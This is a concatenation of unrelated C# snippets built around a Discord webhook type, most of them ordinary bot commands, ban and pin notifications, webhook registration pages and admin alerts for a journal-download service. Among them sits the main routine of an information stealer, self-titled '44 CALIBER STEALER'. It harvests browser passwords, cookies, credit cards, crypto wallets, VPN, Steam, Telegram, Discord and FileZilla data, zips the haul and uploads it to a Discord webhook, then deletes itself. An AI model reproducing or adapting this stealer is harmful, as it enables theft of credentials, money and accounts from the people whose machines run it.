public DotNet(string url) { wb = new DiscordWebhook { Uri = new Uri(url) }; }
internal static DiscordWebhook BuildBanWebhook(Player player, int duration, string reason = "", string issuer = "") { DiscordWebhook webH; List <Field> listOfFields = new List <Field>(); CultureInfo timeFormat = new CultureInfo("ja-JP"); listOfFields.AddField("Playername: ", player?.Name ?? "TEST", true); listOfFields.AddField("Duration: ", (duration / 60).ToString("0", CultureInfo.InvariantCulture) + " minutes", true); listOfFields.AddField("Timespan: ", $"[{DateTime.UtcNow.ToString(timeFormat)}] -> [{DateTime.UtcNow.AddSeconds(duration).ToString(timeFormat)}]"); if (!string.IsNullOrEmpty(reason)) { listOfFields.AddField("Reason: ", reason, true); } if (Config.GetBoolValue("admintoolbox_ban_webhook_include_admin", false)) { listOfFields.AddField("Issued By: ", string.IsNullOrEmpty(issuer) ? "Server" : issuer, true); } webH = new DiscordWebhook { embeds = new EmbedData[] { new EmbedData { author = new Author { name = "User Banned: " }, title = "", fields = listOfFields.ToArray() } } }; return(webH); }
public void TestInvalidLink() { DiscordWebhook webhook = new DiscordWebhook(WorkshopType.Blueprint, "Test01", "ChangeLog"); var response = webhook.Call(""); Assert.That(response == WebhookFailCause.InvalidURL); }
public void TestRottedLink() { DiscordWebhook webhook = new DiscordWebhook(WorkshopType.Blueprint, "Test01", "ChangeLog"); var response = webhook.Call(""); Assert.That(response == WebhookFailCause.NoResponse); }
public async Task getIntro(CommandContext c, DiscordChannel ch = null) { ch = ch ?? c.Channel; DiscordWebhook hook = null; await c.TriggerTypingAsync(); hook = await ch.CreateWebhookAsync("[Cycliq]", reason : "Command run: `get intro`"); string[] images = new string[] { "", "", "" }; await hook.ExecuteAsync(new DiscordWebhookBuilder() .WithAvatarUrl("") .WithUsername("jai") .AddEmbed(new DiscordEmbedBuilder() .WithAuthor("jai, but as a webhook", "", "") .WithDescription(@"Languages i code in: proficient: python, js, HTML, CSS, SCSS not too bad: C#, Java Somewhat Actively Learning: C#, Java, C++, Rust, Zig, SQL Plan to learn: C, Haxe [my youtube](, [my kofi](, [my anilist](, [my steam](, [my keybase](, [my github](, [my telegram](") .WithTitle("your worst daydream") .WithUrl("") .AddField("pronouns", "meow/she/they", true) .AddField("gender", "girl", true) .AddField("sexuality", "pansexual", true) .AddField("what are my aspirations", "in all honesty i would throw away most things to become someone's pet catgirl but other then that i want to make programs and get enough of a passive income to where all of my passions can stay fun and not turn into chores for me and i can live comfortably with my best friends and significant other or i could be a leftist politician that runs on a platform of human rights for every single person in the U.S.") .WithColor(new DiscordColor("#FF1493")) .WithImageUrl(images[c.Services.GetService <Random>().Next(1, 4) - 1]))); await c.Services.GetService <HttpClient>().DeleteAsync($"{hook.Id}/{hook.Token}"); return; }
private async Task <ulong> ExecuteWebhookInner(DiscordChannel channel, DiscordWebhook webhook, string name, string avatarUrl, string content, IReadOnlyList <DiscordAttachment> attachments, bool allowEveryone, bool hasRetried = false) { content = content.Truncate(2000); var dwb = new DiscordWebhookBuilder(); dwb.WithUsername(FixClyde(name).Truncate(80)); dwb.WithContent(content); dwb.AddMentions(content.ParseAllMentions(allowEveryone, channel.Guild)); if (!string.IsNullOrWhiteSpace(avatarUrl)) { dwb.WithAvatarUrl(avatarUrl); } var attachmentChunks = ChunkAttachmentsOrThrow(attachments, 8 * 1024 * 1024); if (attachmentChunks.Count > 0) { _logger.Information("Invoking webhook with {AttachmentCount} attachments totalling {AttachmentSize} MiB in {AttachmentChunks} chunks", attachments.Count, attachments.Select(a => a.FileSize).Sum() / 1024 / 1024, attachmentChunks.Count); await AddAttachmentsToBuilder(dwb, attachmentChunks[0]); } DiscordMessage response; using (_metrics.Measure.Timer.Time(BotMetrics.WebhookResponseTime)) { try { response = await webhook.ExecuteAsync(dwb); } catch (JsonReaderException) { // This happens sometimes when we hit a CloudFlare error (or similar) on Discord's end // Nothing we can do about this - happens sometimes under server load, so just drop the message and give up throw new WebhookExecutionErrorOnDiscordsEnd(); } catch (NotFoundException e) { var errorText = e.WebResponse?.Response; if (errorText != null && errorText.Contains("10015") && !hasRetried) { // Error 10015 = "Unknown Webhook" - this likely means the webhook was deleted // but is still in our cache. Invalidate, refresh, try again _logger.Warning("Error invoking webhook {Webhook} in channel {Channel}", webhook.Id, webhook.ChannelId); var newWebhook = await _webhookCache.InvalidateAndRefreshWebhook(channel, webhook); return(await ExecuteWebhookInner(channel, newWebhook, name, avatarUrl, content, attachments, allowEveryone, hasRetried : true)); } throw; } } // We don't care about whether the sending succeeds, and we don't want to *wait* for it, so we just fork it off var _ = TrySendRemainingAttachments(webhook, name, avatarUrl, attachmentChunks); return(response.Id); }
/// <summary>Generate a new webhook instance with the provided settings.</summary> public WebhookInfo(ulong id, string token) { webhook = Program.BotClient.GetWebhookWithTokenAsync(id, token) .ConfigureAwait(false).GetAwaiter().GetResult(); Id = id; validWebhook = true; }
internal static string SendWebhook(DiscordWebhook discordWebHook, string url) { if (!string.IsNullOrEmpty(url) && Uri.TryCreate(url, UriKind.Absolute, out Uri uri)) { byte[] jsonData = Utf8Json.JsonSerializer.Serialize(discordWebHook); Debug("WebHook sent: \n" + Utf8.GetString(jsonData)); return(WebPost(uri, jsonData)); } else { return("Failed creating URI of WebHook link: " + url); } }
static async Task SendAdminNotification(DiscordWebhook discord, string message, string description, Dictionary <string, string> fields = null) { await discord.SendMessageAsync(message, new List <DiscordWebhookEmbed> { new DiscordWebhookEmbed { Description = description, Fields = (fields ?? new Dictionary <string, string>()).Select(k => new DiscordWebhookEmbedField { Name = k.Key, Value = k.Value }).ToList() } }); }
/// <summary> /// Gets a list of webhooks active for the specified guild text channel. /// <para>Requires <see cref="DiscordPermission.ManageWebhooks"/>.</para> /// </summary> /// <exception cref="DiscordHttpApiException"></exception> public async Task <IReadOnlyList <DiscordWebhook> > GetChannelWebhooks(Snowflake channelId) { DiscordApiData apiData = await rest.Get($"channels/{channelId}/webhooks", $"channels/{channelId}/webhooks").ConfigureAwait(false); DiscordWebhook[] webhooks = new DiscordWebhook[apiData.Values.Count]; for (int i = 0; i < apiData.Values.Count; i++) { webhooks[i] = new DiscordWebhook(this, apiData.Values[i]); } return(webhooks); }
public async Task <IActionResult> DeleteDiscordWebhook(DeleteDiscordWebhookViewModel model) { model.Message = string.Empty; try { if (ModelState.IsValid) { DiscordWebhook dbDiscordWebhook = await ( from s in _context.DiscordWebhooks where string.Compare(s.Url, model.Url, true) == 0 select s ).FirstOrDefaultAsync(); if (dbDiscordWebhook != null && dbDiscordWebhook.DeletedAt == null) { dbDiscordWebhook.DeletedAt = DateTimeOffset.Now; await _context.SaveChangesAsync(); if (_cache.TryGetValue(__tadwsKey, out int value)) { _cache.Remove(__tadwsKey); } await SendGoogleAnalyticsConversion ( "discord-webhook", "deregister", "na", model.Url.ToLowerInvariant().GetHashCode().ToString() ); } model.Message = "<div class=\"alert alert-success\">Your Discord Webhook has been successfully deregistered.</div>"; } } catch (Exception ex) { // TODO log model.Message = "<div class=\"alert alert-danger\">An error has occured. Please try again later.</div>"; Trace.WriteLine(ex); } return(View(model)); }
public void SendMessage(string[] args, EMessageType messageType) { DiscordWebhook webhook = configuration.Webhooks.FirstOrDefault(x => x.WebhookType == messageType.ToString()); if (webhook == null || string.IsNullOrEmpty(webhook.WebhookUrl)) { return; } List <Field> fields = new List <Field>(); string[] array = webhook.MessageFormat.Split(new string[] { ": ", ", " }, StringSplitOptions.RemoveEmptyEntries); int num = 0; while (num < array.Length - 1) { string[] arr = array.Skip(num).Take(2).ToArray(); string value = arr[1].Replace("{name}", args[0]).Replace("{steamid}", args[1]).Replace("{punisher}", args[2]); if (messageType != EMessageType.Unban) { value = value.Replace("{reason}", args[3]); } if (messageType == EMessageType.Ban) { value = value.Replace("{duration}", args[4]); } Field field = new Field(arr[0], value, true); fields.Add(field); num += 2; } DiscordWebhookMessage msg = new DiscordWebhookMessage(); msg.embeds = new List <Embed>() { new Embed(fields) }; using (WebClient wc = new WebClient()) { wc.Headers.Add(HttpRequestHeader.ContentType, "application/json"); wc.UploadString(webhook.WebhookUrl, JsonConvert.SerializeObject(msg)); } }
public async Task DeleteAsync(CommandContext ctx, [Description("Name.")] string name, [Description("Channel to list webhooks for.")] DiscordChannel channel = null) { channel = channel ?? ctx.Channel; IEnumerable <DiscordWebhook> whs = await channel.GetWebhooksAsync(); DiscordWebhook wh = whs.SingleOrDefault(w => w.Name.ToLowerInvariant() == name.ToLowerInvariant()); if (wh is null) { throw new CommandFailedException($"Webhook with name {Formatter.InlineCode(name)} does not exist!"); } await wh.DeleteAsync(); await this.InformAsync(ctx, $"Successfully deleted webhook {Formatter.InlineCode(wh.Name)}!", important : false); }
/// <summary> /// Used to send embeds or messages via a webhook /// </summary> public WebHookHandler(DiscordChannel channel, string username, string avatarUrl = null) { if (channel == null) { throw new ArgumentNullException(nameof(channel)); } else if (string.IsNullOrEmpty(username)) { throw new ArgumentNullException(nameof(username)); } if (!string.IsNullOrEmpty(avatarUrl)) { _avatarUrl = new Uri(avatarUrl); } _username = username; _webhook = channel.CreateWebhookAsync(username).ConfigureAwait(false).GetAwaiter().GetResult(); }
public async Task CopyPinAsync(DiscordWebhook hook, DiscordMessage message, GuildInfo info, PinsDbContext db) { var content = new StringBuilder(); var attachments = message.Attachments.ToList(); var messageLink = $"{message.Channel.GuildId}/{message.ChannelId}/{message.Id}"; var embed = new DiscordEmbedBuilder() .WithAuthor($"{message.Author.Username}", messageLink, message.Author.GetAvatarUrl(ImageFormat.Png, 128)) .WithDescription(message.Content.Length <= 1000 ? message.Content : $"{message.Content.Substring(0, 997)}...") .WithTimestamp(message.Timestamp) .WithFooter($"In #{message.Channel.Name}"); if ((message.Author as DiscordMember).Color.Value != default) { embed.WithColor((message.Author as DiscordMember).Color); } foreach (var attachment in attachments) { var ext = Path.GetExtension(attachment.FileName.ToLowerInvariant()); if ((ext == ".jpg" || ext == ".png" || ext == ".gif" || ext == ".webp") && attachment.Width != 0 && embed.ImageUrl == null) { embed.WithImageUrl(attachment.Url); } else { content.AppendLine(attachment.Url); } } var currentMember = message.Channel.Guild.CurrentMember; await hook.ExecuteAsync(content.ToString(), currentMember.Username, currentMember.AvatarUrl, false, new[] { embed.Build() }, null); var dbPin = new PinnedMessage() { GuildId = info.Id, Id = (long)message.Id }; info.PinnedMessages.Add(dbPin); await db.AddAsync(dbPin); }
private async Task TrySendRemainingAttachments(DiscordWebhook webhook, string name, string avatarUrl, IReadOnlyList <IReadOnlyCollection <DiscordAttachment> > attachmentChunks) { if (attachmentChunks.Count <= 1) { return; } for (var i = 1; i < attachmentChunks.Count; i++) { var dwb = new DiscordWebhookBuilder(); if (avatarUrl != null) { dwb.WithAvatarUrl(avatarUrl); } dwb.WithUsername(name); await AddAttachmentsToBuilder(dwb, attachmentChunks[i]); await webhook.ExecuteAsync(dwb); } }
public async Task <CommandResult> RunAsync(DiscordChannel channel) { if (channel.Guild.Id == Context.Guild.Id) { GuildData data = this.GetData <GuildData>(channel.Guild.Id.ToString()); if (data.Webhook != null) { return("Pins have already been configured for this server. Run this command without arguments to disable pin redirection."); } var webhooks = await channel.GetWebhooksAsync(); using (MemoryStream str = new MemoryStream()) using (Stream sourceStr = await _client.GetStreamAsync(Context.Client.CurrentUser.AvatarUrl)) { sourceStr.CopyTo(str); str.Seek(0, SeekOrigin.Begin); DiscordWebhook webhook = await channel.CreateWebhookAsync("WamBot Pins Webhook", str, $"Pins setup by {Context.Author.Username}#{Context.Author.Discriminator}"); Meta.WebhookClient.AddWebhook(webhook); await webhook.ExecuteAsync("Webhook setup!"); data.Webhook = webhook; DiscordMessage msg = await Context.ReplyAsync("Updating pins, this may take a while..."); await Meta.UpdatePinsAsync(DateTimeOffset.Now, Context.Channel, data, Context.Client); await msg.DeleteAsync(); this.SetData(channel.Guild.Id.ToString(), data); return("Pins channel configured and updated!"); } } else { return("Oi! You cannae do that!"); } }
public void SendMessage(string content, EMessageType messageType) { DiscordWebhook webhook = configuration.Webhooks.FirstOrDefault(x => x.WebhookType == messageType.ToString()); if (webhook == null || string.IsNullOrEmpty(webhook.WebhookUrl)) { return; } DiscordWebhookMessage msg = new DiscordWebhookMessage(); msg.embeds = new List <Embed>() { new Embed(content, Convert.ToInt32(webhook.WebhookColor, 16)) }; using (WebClient wc = new WebClient()) { wc.Headers.Add(HttpRequestHeader.ContentType, "application/json"); wc.UploadString(webhook.WebhookUrl, JsonConvert.SerializeObject(msg)); } }
public static string BuildUrlString(this DiscordWebhook wh) => $"{ wh.ChannelId }/{ wh.Token }";
static async Task <(HttpStatusCode code, HttpResponseMessage message)> GetJournalAsync(DateTime journalDate, Shared.Models.User.Profile user, MSSQLDB db, HttpClient hc, MinioClient minioClient, DiscordWebhook discord) { var oldJournalRow = await db.ExecuteListAsync <UserJournal>( "SELECT TOP 1 * FROM user_journal WHERE user_identifier = @user_identifier AND journal_date = @journal_date", new SqlParameter("user_identifier", user.UserIdentifier), new SqlParameter("journal_date", journalDate) ); if (oldJournalRow.Count > 1) { throw new TooManyOldJournalItemsException(journalDate, user.UserIdentifier); } var previousRow = oldJournalRow.FirstOrDefault(); if (previousRow?.CompleteEntry ?? false) { return(HttpStatusCode.OK, null); } var pollicy = Policy <HttpResponseMessage> .Handle <HttpRequestException>() .OrResult(r => !r.IsSuccessStatusCode) .OrResult(r => r.StatusCode == HttpStatusCode.PartialContent) .WaitAndRetryAsync(100, attempt => TimeSpan.FromSeconds(5)); var journalRequest = await pollicy.ExecuteAsync(() => hc.GetAsync($"/journal/{journalDate.Year}/{journalDate.Month}/{journalDate.Day}")); var journalContent = await journalRequest.Content.ReadAsStringAsync(); if (!journalRequest.IsSuccessStatusCode || journalRequest.StatusCode == HttpStatusCode.PartialContent) { return(journalRequest.StatusCode, journalRequest); } var journalRows = journalContent.Trim().Split('\n', StringSplitOptions.RemoveEmptyEntries); bool updateFileOnS3 = (previousRow?.LastProcessedLineNumber ?? 0) != journalRows.Length && (previousRow?.LastProcessedLine != (journalRows.LastOrDefault() ?? string.Empty)) && journalContent.Trim() != "{}"; if (!string.IsNullOrWhiteSpace(journalContent) && journalContent.Trim() != "{}") { var firstValidRow = string.Empty; foreach (var row in journalRows) { try { _ = JsonDocument.Parse(row).RootElement; firstValidRow = row; break; } catch { } } if (!string.IsNullOrWhiteSpace(firstValidRow)) { try { var row = JsonDocument.Parse(firstValidRow).RootElement; var apiFileHeader = new { Timestamp = row.GetProperty("timestamp").GetString(), Event = "JournalLimpetFileheader", Description = "Missing fileheader from cAPI journal" }; var serializedApiFileHeader = JsonSerializer.Serialize(apiFileHeader, new JsonSerializerOptions { PropertyNamingPolicy = JsonNamingPolicy.CamelCase }); serializedApiFileHeader = serializedApiFileHeader.Insert(serializedApiFileHeader.Length - 1, " ").Insert(1, " "); journalContent = serializedApiFileHeader + "\n" + journalContent; } catch (Exception ex) { if (ex.ToString().Contains("Json")) { var errorMessage = "Line failed: " + firstValidRow; await SendAdminNotification(discord, "**[JOURNAL]** JSON Reader Exception while fetching first item", errorMessage ); return(HttpStatusCode.InternalServerError, new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent("faulty row: " + firstValidRow) }); } } } } var journalLineCount = journalContent.Trim().Split('\n', StringSplitOptions.RemoveEmptyEntries).Length; var journalBytes = ZipManager.Zip(journalContent.Trim()); string fileName = $"{user.UserIdentifier}/journal/{journalDate.Year}/{journalDate.Month.ToString().PadLeft(2, '0')}/{journalDate.Day.ToString().PadLeft(2, '0')}.journal"; if (updateFileOnS3) { using (var ms = new MemoryStream(journalBytes)) { var policy = Policy .Handle <ConnectionException>() .WaitAndRetryAsync(new[] { TimeSpan.FromSeconds(1), TimeSpan.FromSeconds(2), TimeSpan.FromSeconds(4), TimeSpan.FromSeconds(8), TimeSpan.FromSeconds(16), }); await policy.ExecuteAsync(() => minioClient.PutObjectAsync("journal-limpet", fileName, ms, ms.Length, "application/gzip")); } await SSEActivitySender.SendUserActivityAsync(user.UserIdentifier, $"Downloaded journals for {journalDate:yyyy-MM-dd}", $"We downloaded {journalLineCount:N0} lines of journal for this day", "success" ); await SSEActivitySender.SendStatsActivityAsync(db); } if (previousRow == null) { await db.ExecuteNonQueryAsync(@"INSERT INTO user_journal (user_identifier, journal_date, s3_path, last_processed_line, last_processed_line_number, complete_entry, last_update) VALUES (@user_identifier, @journal_date, @s3_path, @last_processed_line, @last_processed_line_number, @complete_entry, GETUTCDATE())", new SqlParameter("user_identifier", user.UserIdentifier), new SqlParameter("journal_date", journalDate), new SqlParameter("s3_path", fileName), new SqlParameter("last_processed_line", journalRows.LastOrDefault() ?? string.Empty), new SqlParameter("last_processed_line_number", journalLineCount), new SqlParameter("complete_entry", DateTime.UtcNow.Date > journalDate.Date) ); } else { await db.ExecuteNonQueryAsync(@"UPDATE user_journal SET last_processed_line = @last_processed_line, last_processed_line_number = @last_processed_line_number, complete_entry = @complete_entry, last_update = GETUTCDATE() WHERE journal_id = @journal_id AND user_identifier = @user_identifier", new SqlParameter("journal_id", previousRow.JournalId), new SqlParameter("user_identifier", user.UserIdentifier), new SqlParameter("last_processed_line", journalRows.LastOrDefault() ?? string.Empty), new SqlParameter("last_processed_line_number", journalLineCount), new SqlParameter("complete_entry", DateTime.UtcNow.Date > journalDate.Date) ); } Thread.Sleep(5000); return(HttpStatusCode.OK, journalRequest); }
public DiscordWebhookOAuthResponse(DiscordWebhook webhook) { Webhook = webhook; }
public Startup(IConfiguration configuration, IHostEnvironment hostingEnvironment) { Configuration = configuration; HostingEnvironment = hostingEnvironment; DiscordWebhook.SetWebhooks(Configuration.GetSection("DiscordWebhooks")); }
private static async Task <bool> SendEventBatch(Guid userIdentifier, PerformContext context, IConfiguration configuration, DiscordWebhook discordClient, HttpClient hc, string lastLine, UserJournal journalItem, bool loggingEnabled, IntegrationJournalData ijd, List <Dictionary <string, object> > journalEvents) { var breakJournal = false; await SSEActivitySender.SendUserLogDataAsync(userIdentifier, new { fromIntegration = "Canonn R&D", data = journalEvents }); var json = JsonSerializer.Serialize(journalEvents, new JsonSerializerOptions() { WriteIndented = true }); if (loggingEnabled) { context.WriteLine($"Sent event:\n{json}"); } var res = await SendEventsToCanonn(hc, configuration, json, context); switch (res.errorCode) { // These codes are OK case 200: break; // We're sending too many requests at once, let's break out of the loop and wait until next batch case 429: breakJournal = true; context.WriteLine("We're sending stuff too quickly, breaking out of the loop"); context.WriteLine(lastLine); context.WriteLine(res.resultContent); await discordClient.SendMessageAsync("**[Canonn R&D Upload]** Rate limited by Canonn", new List <DiscordWebhookEmbed> { new DiscordWebhookEmbed { Description = res.resultContent, Fields = new Dictionary <string, string>() { { "User identifier", userIdentifier.ToString() }, { "Last line", lastLine }, { "Journal", journalItem.S3Path }, { "Current GameState", JsonSerializer.Serialize(ijd.CurrentGameState, new JsonSerializerOptions { WriteIndented = true }) } }.Select(k => new DiscordWebhookEmbedField { Name = k.Key, Value = k.Value }).ToList() } }); await Task.Delay(30000); break; // Exceptions and debug case 500: // Exception: %% case 501: // %% case 502: // Broken gateway case 503: breakJournal = true; context.WriteLine("We got an error from the service, breaking off!"); context.WriteLine(lastLine); context.WriteLine(res.resultContent); await discordClient.SendMessageAsync("**[Canonn R&D Upload]** Error from the API", new List <DiscordWebhookEmbed> { new DiscordWebhookEmbed { Description = res.resultContent, Fields = new Dictionary <string, string>() { { "User identifier", userIdentifier.ToString() }, { "Last line", lastLine }, { "Journal", journalItem.S3Path }, { "Current GameState", JsonSerializer.Serialize(ijd.CurrentGameState, new JsonSerializerOptions { WriteIndented = true }) } }.Select(k => new DiscordWebhookEmbedField { Name = k.Key, Value = k.Value }).ToList() } }); break; default: breakJournal = true; context.WriteLine("We got an error from the service, breaking off!"); context.WriteLine(lastLine); context.WriteLine(res.resultContent); await discordClient.SendMessageAsync("**[Canonn R&D Upload]** Unhandled response code", new List <DiscordWebhookEmbed> { new DiscordWebhookEmbed { Description = res.resultContent, Fields = new Dictionary <string, string>() { { "User identifier", userIdentifier.ToString() }, { "Last line", lastLine }, { "Journal", journalItem.S3Path }, { "Current GameState", JsonSerializer.Serialize(ijd.CurrentGameState, new JsonSerializerOptions { WriteIndented = true }) } }.Select(k => new DiscordWebhookEmbedField { Name = k.Key, Value = k.Value }).ToList() } }); break; } return(breakJournal); }
public static void Main(string[] args) { if (!File.Exists(Help.ExploitDir)) // Проверка запущен ли уже стиллер { if (Process.GetProcessesByName(Process.GetCurrentProcess().ProcessName).Length == 1) // Проверка запущен ли уже стиллер { try { Directory.CreateDirectory(Help.ExploitDir); List <Thread> Threads = new List <Thread>(); Threads.Add(new Thread(() => Browsers.Start())); // Старт потока с браузерами Threads.Add(new Thread(() => Files.GetFiles())); // Старт потока с грабом файлов Threads.Add(new Thread(() => StartWallets.Start())); // Старт потока c криптокошельками Threads.Add(new Thread(() => { Help.Ethernet(); // Получение информации о айпи Screen.GetScreen(); // Скриншот экрана ProcessList.WriteProcesses(); // Получение списка процессов SystemInfo.GetSystem(); // Скриншот экрана })); Threads.Add(new Thread(() => { ProtonVPN.Save(); OpenVPN.Save(); NordVPN.Save(); Steam.SteamGet(); })); Threads.Add(new Thread(() => { Discord.WriteDiscord(); FileZilla.GetFileZilla(); Telegram.GetTelegramSessions(); Vime.Get(); })); foreach (Thread t in Threads) { t.Start(); } foreach (Thread t in Threads) { t.Join(); } // Пакуем в апхив с паролем string zipArchive = Help.ExploitDir + "\\" + SystemInfo.CountryCode() + SystemInfo.IP() + "(" + Help.dateLog + ")" + ".zip"; using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку { zip.ParallelDeflateThreshold = -1; zip.UseZip64WhenSaving = Ionic.Zip.Zip64Option.Always; zip.CompressionLevel = Ionic.Zlib.CompressionLevel.Default; // Задаем степень сжатия zip.Comment = "\n ================================================" + "\n ===============44 CALIBER STEALER===============" + "\n ================================================" + "\n Maded by ChaosInsurgency |" + "\n telegram @chaosinsurgency " + "\n Written exclusively for educational purposes! I am not responsible for the use of this project and any of its parts code."; zip.Password = Config.zipPass; zip.AddDirectory(Help.ExploitDir); // Кладем в архив содержимое папки с логом zip.Save(zipArchive); // Сохраняем архив } string mssgBody = "\n :spy: NEW LOG FROM - " + Environment.MachineName + " " + Environment.UserName + " :person_in_manual_wheelchair:" + "\n :eye: IP: " + SystemInfo.IP() + " " + SystemInfo.Country() + "\n :desktop: " + SystemInfo.GetSystemVersion() + "\n ================================" + "\n :key: Passwords - " + Counting.Passwords + "\n :cookie: Cookies - " + Counting.Cookies + //"\n History - " + Counting.History + "\n :notepad_spiral: AutoFills - " + Counting.AutoFill + "\n :credit_card: CC - " + Counting.CreditCards + "\n :file_folder: Grabbed Files - " + Counting.FileGrabber + "\n ================================" + "\n GRABBED SOFTWARE:" + (Counting.Discord > 0 ? "\n Discord" : "") + (Counting.Wallets > 0 ? "\n Wallets" : "") + (Counting.Telegram > 0 ? "\n Telegram" : "") + (Counting.FileZilla > 0 ? "\n FileZilla" + " (" + Counting.FileZilla + ")" : "") + (Counting.Steam > 0 ? "\n Steam" : "") + (Counting.NordVPN > 0 ? "\n NordVPN" : "") + (Counting.OpenVPN > 0 ? "\n OpenVPN" : "") + (Counting.ProtonVPN > 0 ? "\n ProtonVPN" : "") + (Counting.VimeWorld > 0 ? "\n VimeWorld" + (Config.VimeWorld == true ? $":\n NickName - {Vime.NickName()} " + $":\n Donate - {Vime.Donate()} " + $":\n Level - {Vime.Level()}" : "") : "") + "\n ================================" + "\n DOMAINS DETECTED:" + "\n - " + URLSearcher.GetDomainDetect(Help.ExploitDir + "\\Browsers\\"); string filename = Environment.MachineName + "." + Environment.UserName + ".zip"; string fileformat = "zip"; string filepath = zipArchive; string application = ""; try { DiscordWebhook.SendFile(mssgBody, filename, fileformat, filepath, application); // Отправка лога в дискорд } catch { DiscordWebhook.Send("Log size is more then 8 MB. Sending isn`t available."); /* В дискорде имеется ограничение на макс. размер файла. На серверах без буста максимальный размер файла 8 мб, когда с бустом 50. * Если есть возможность использовать сервер с бустом, то используйте его. */ } Finish(); // Автоудаление } catch (Exception e) { Console.WriteLine(e); } } } }
public async Task <IActionResult> DiscordWebhooks(AddDiscordWebhookViewModel model) { try { string failedTestMessage = "<div class=\"alert alert-danger\">Failed to register Discord Webhook. Please make sure you have created the Discord Webhook on your Discord server and that the provided URL is valid.</div>"; string successMessage = "<div class=\"alert alert-success\">Your Discord Webhook has been successfully registered.</div>"; model.Message = string.Empty; bool recaptchaResult = await VerifyGoogleRecaptcha(model.RecaptchaResponse); if (!recaptchaResult) { model.Message = "<div class=\"alert alert-danger\">Recaptcha validation failed.</div>"; return(View(model)); } if (ModelState.IsValid) { // Find existing discord webhook. DiscordWebhook dbDiscordWebhook = await ( from s in _context.DiscordWebhooks where string.Compare(s.Url, model.Url, true) == 0 select s ).FirstOrDefaultAsync(); // Was existing found? if (dbDiscordWebhook != null) { // Existing found, is it registered? if (dbDiscordWebhook.DeletedAt != null) { // Test discord webhook bool isDiscordWebhookValid = await ValidateDiscordWebhook(model.Url); if (isDiscordWebhookValid) { // Update deregistered. dbDiscordWebhook.DeletedAt = null; // Save changes. await _context.SaveChangesAsync(); if (_cache.TryGetValue(__tadwsKey, out int value)) { _cache.Remove(__tadwsKey); } await SendGoogleAnalyticsConversion ( "discord-webhook", "reregister", "na", model.Url.ToLowerInvariant().GetHashCode().ToString() ); model.Message = successMessage; } else { model.Message = failedTestMessage; } } else { // Else nothing, already registered. model.Message = successMessage; } } else { // Test discord webhook bool isDiscordWebhookValid = await ValidateDiscordWebhook(model.Url); if (isDiscordWebhookValid) { // Add new discord webhook await _context.DiscordWebhooks.AddAsync ( new DiscordWebhook() { CreatedAt = DateTimeOffset.Now, DeletedAt = null, Url = model.Url.Left(250), DiscordWebhookId = 0, UpdatedAt = DateTimeOffset.Now } ); await _context.SaveChangesAsync(); if (_cache.TryGetValue(__tadwsKey, out int value)) { _cache.Remove(__tadwsKey); } await SendGoogleAnalyticsConversion ( "discord-webhook", "register", "na", model.Url.ToLowerInvariant().GetHashCode().ToString() ); model.Message = successMessage; } else { model.Message = failedTestMessage; } } } } catch (Exception ex) { // TODO log model.Message = "<div class=\"alert alert-danger\">An error has occured. Please try again later.</div>"; Trace.WriteLine(ex); } model.Stats = await GetStats(); return(View(model)); }
public async Task <DiscordWebhook> InvalidateAndRefreshWebhook(DiscordChannel channel, DiscordWebhook webhook) { _logger.Information("Refreshing webhook for channel {Channel}", webhook.ChannelId); _webhooks.TryRemove(webhook.ChannelId, out _); return(await GetWebhook(channel)); }
private bool IsWebhookMine(DiscordWebhook arg) => arg.User.Id == _client.CurrentUser.Id && arg.Name == WebhookName;
static async Task <(bool failedRequest, bool shouldBail)> TryGetJournalAsync(DiscordWebhook discord, DateTime journalDate, Shared.Models.User.Profile user, MSSQLDB db, HttpClient hc, MinioClient minioClient, PerformContext context) { try { var res = await GetJournalAsync(journalDate, user, db, hc, minioClient, discord); int loop_counter = 0; while (res.code != HttpStatusCode.OK) { Thread.Sleep(5000); var content = await res.message.Content.ReadAsStringAsync(); if (content.Contains("to purchase Elite: Dangerous")) { await db.ExecuteNonQueryAsync("UPDATE user_profile SET skip_download = 1 WHERE user_identifier = @user_identifier", new SqlParameter("user_identifier", user.UserIdentifier)); await SendAdminNotification( discord, "Failed to download journal, cannot access cAPI", "User probably has a Epic Games account", new Dictionary <string, string> { { "Response code", res.code.ToString() }, { "Content", content }, { "User identifier", user.UserIdentifier.ToString() }, { "Journal date", journalDate.ToString("yyyy-MM-dd") } } ); return(false, true); } if (loop_counter > 10) { await SendAdminNotification( discord, "Failed to download journal", "Encountered an error too many times", new Dictionary <string, string> { { "Response code", res.code.ToString() }, { "Content", content }, { "User identifier", user.UserIdentifier.ToString() }, { "Journal date", journalDate.ToString("yyyy-MM-dd") } } ); return(false, false); } switch (res.code) { case HttpStatusCode.PartialContent: Thread.Sleep(5000); res = await GetJournalAsync(journalDate, user, db, hc, minioClient, discord); break; } loop_counter++; } } catch (TooManyOldJournalItemsException ex) { await SendAdminNotification(discord, "**[JOURNAL]** Exception: Too many old journal items", "The user somehow has duplicates of journals stored for a single date", new Dictionary <string, string> { { "Exception", ex.ToString() }, { "User identifier", user.UserIdentifier.ToString() } } ); return(false, true); } catch (Exception ex) { var errorMessage = ex.ToString() + "\n\n" + JsonSerializer.Serialize(user, new JsonSerializerOptions() { WriteIndented = true }); await SendAdminNotification(discord, "**[JOURNAL]** Unhandled exception while downloading journals", errorMessage ); return(false, false); } return(true, false); }